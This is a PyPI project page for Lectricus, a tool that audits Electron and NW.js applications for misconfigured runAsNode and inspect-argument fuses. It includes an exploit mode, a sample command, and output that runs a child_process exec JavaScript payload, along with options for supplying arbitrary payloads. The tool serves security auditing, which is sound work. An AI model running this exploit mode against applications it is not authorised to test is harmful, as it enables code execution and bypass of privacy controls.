Electron and NWJS Vulnerability Detection Utility

Navigation

Verified details

These details have been verified by PyPI
Maintainers
Avatar for RIPEDA from gravatar.com RIPEDA

Unverified details

These details have not been verified by PyPI
Project links
GitHub Statistics

View statistics for this project via Libraries.io, or by using our public dataset on Google BigQuery

Meta

License: BSD License (3-clause BSD License)

Author: RIPEDA Consulting

Requires: Python >=3.6

Classifiers

Project description

App Icon

Project Lectricus

Python-based library for programmatically detecting potentially misconfigured Electron applications, specifically the runAsNode and enableNodeCliInspectArguments fuses allowing arbitrary code execution within the context of the application.

First unveiled at MacDevOpsYVR 2024: Electron Security: Making your Mac a worse place?

This project is primarily designed for auditing purposes, starting as a side project after learning about @tsunek0h's CVE-2023-32546 and later on extending the initial work of Wojciech Reguła's electroniz3r:

  • Programmatic fuse configuration detection
  • Multi-platform support (macOS, Windows, Linux)
  • Exporting of vulnerable applications to various formats (XML, JSON, CSV, etc.)
  • Developed as a library, for easy integration into other projects
  • Targets both Electron and NW.js applications
  • Simple macOS GUI for non-technical users

Since the initial conception of Lectricus in late 2023, Electron has released a statement on Electron's runAsNode fuse: Statement regarding "runAsNode" CVEs

Do keep in mind that Electron does not discuss the TCC bypasses that the misconfigured Electron fuses cause.

Installation

For standalone executables, see GitHub Releases.

For Python-based installation of the Python library, Lectricus is available on PyPI:

$ python3 -m pip install lectricus

Usage - GUI

Simply run Lectricus (GUI).app on macOS, and select List vulnerable electron applications to get a list of vulnerable applications.

First window List applications
Lectricus - GUI - First window Lectricus - GUI - List applications

Usage - Command Line

List Vulnerable Applications

$ lectricus --list-vulnerable-apps

>>> Found 4 vulnerable applications 😱
>>> Correctly Configured Electron Fuses:
>>>   - /Applications/1Password.app
>>>   - /Applications/Keeper Password Manager.app
>>>   - /Applications/Slack.app
>>> Lacking Electron Fuse Support:
>>>   - /Applications/Advanced Privacy.app
>>>     - Vulnerabilities:
>>>       - RUN_AS_NODE
>>>       - ENABLE_NODE_CLI_INSPECT_ARGUMENTS
>>> Misconfigured Electron Fuses:
>>>   - /Applications/Tap Trustee.app
>>>     - Vulnerabilities:
>>>       - RUN_AS_NODE
>>>       - ENABLE_NODE_CLI_INSPECT_ARGUMENTS
>>>   - /Applications/Affected Makeup.app
>>>     - Vulnerabilities:
>>>       - ENABLE_NODE_CLI_INSPECT_ARGUMENTS
>>>   - /Applications/Struck Cap.app
>>>     - Vulnerabilities:
>>>       - RUN_AS_NODE
>>>       - ENABLE_NODE_CLI_INSPECT_ARGUMENTS

Attempt Arbitrary Code Execution

$ lectricus.py --exploit-application "/Applications/Advanced Privacy.app"

>>> Selected exploit method: run_as_node
>>> Determined entry point: /Applications/Advanced Privacy.app/Contents/MacOS/Advanced Privacy
>>> Running exploit on /Applications/Advanced Privacy.app/Contents/MacOS/Advanced Privacy
>>> JavaScript payload: const { exec } = require("child_process"); exec("/usr/bin/open -a Calculator");

Command Line Parameters

Detect and exploit misconfigured Electron applications

options:
  -h, --help            show this help message and exit
  --list-vulnerable-apps, -l
                        List vulnerable applications
  --export, -e          Export vulnerable applications, if '--export-location' is not specified, export to STDOUT
  --format FORMAT, -f FORMAT
                        Export format (xml, plist, json, csv)
  --export-location EXPORT_LOCATION, -o EXPORT_LOCATION
                        Export location
  --app-directory APP_DIRECTORY, -d APP_DIRECTORY
                        Application directory to search. Can provide .app directly
  --sys-platform SYS_PLATFORM, -p SYS_PLATFORM
                        Override sys.platform value used for application search. Useful for cross-platform exploitation on external
                        drives.
  --exploit-application EXPLOIT_APPLICATION, -x EXPLOIT_APPLICATION
                        Application to exploit.
  --exploit-method EXPLOIT_METHOD, -m EXPLOIT_METHOD
                        Exploit method to use.
  --javascript-payload JAVASCRIPT_PAYLOAD, -j JAVASCRIPT_PAYLOAD
                        JavaScript payload to execute. If not specified, open
                        Calculator on macOS.
  --javascript-payload-file JAVASCRIPT_PAYLOAD_FILE, -J JAVASCRIPT_PAYLOAD_FILE
                        JavaScript payload file to execute. Alternative to '--
                        javascript-payload'.

Project details

Verified details

These details have been verified by PyPI
Maintainers
Avatar for RIPEDA from gravatar.com RIPEDA

Unverified details

These details have not been verified by PyPI
Project links
GitHub Statistics

View statistics for this project via Libraries.io, or by using our public dataset on Google BigQuery

Meta

License: BSD License (3-clause BSD License)

Author: RIPEDA Consulting

Requires: Python >=3.6

Classifiers

Release history Release notifications | RSS feed

This version

1.0.0

0.0.1

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distributions

No source distribution files available for this release.See tutorial on generating distribution archives.

Built Distribution

lectricus-1.0.0-py3-none-any.whl (13.6 kB view hashes)

Uploaded Python 3

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page